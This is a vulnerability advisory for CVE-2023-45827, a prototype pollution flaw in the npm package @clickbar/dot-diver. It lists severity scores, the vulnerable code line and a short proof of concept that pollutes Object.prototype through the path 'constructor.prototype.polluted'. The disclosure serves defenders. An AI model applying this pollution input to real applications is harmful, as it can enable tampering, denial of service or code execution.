CVE-2023-45827 – @clickbar/dot-diver

Package

Manager: npm
Name: @clickbar/dot-diver
Vulnerable Version: >=0 <1.0.2

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N

EPSS: 0.07227 pctl0.91247

Details

Prototype Pollution(PP) vulnerability in setByPath ### Summary There is a Prototype Pollution(PP) vulnerability in dot-diver. It can leads to RCE. ### Details ```javascript //https://github.com/clickbar/dot-diver/tree/main/src/index.ts:277 // eslint-disable-next-line @typescript-eslint/no-unsafe-member-access objectToSet[lastKey] = value ``` In this code, there is no validation for Prototpye Pollution. ### PoC ```javascript import { getByPath, setByPath } from '@clickbar/dot-diver' console.log({}.polluted); // undefined setByPath({},'constructor.prototype.polluted', 'foo'); console.log({}.polluted); // foo ``` ### Impact It is Prototype Pollution(PP) and it can leads to Dos, RCE, etc. ### Credits Team : NodeBoB 최지혁 ( Jihyeok Choi ) 이동하 ( Lee Dong Ha of ZeroPointer Lab ) 강성현    ( kang seonghyeun ) 박성진    ( sungjin park ) 김찬호    ( Chanho Kim ) 이수영    ( Lee Su Young ) 김민욱    ( MinUk Kim )

Metadata

Created: 2023-11-03T19:03:40Z
Modified: 2023-11-06T19:34:19Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-9w5f-mw3p-pj47/GHSA-9w5f-mw3p-pj47.json
CWE IDs: ["CWE-1321"]
Alternative ID: GHSA-9w5f-mw3p-pj47
Finding: F390
Auto approve: 1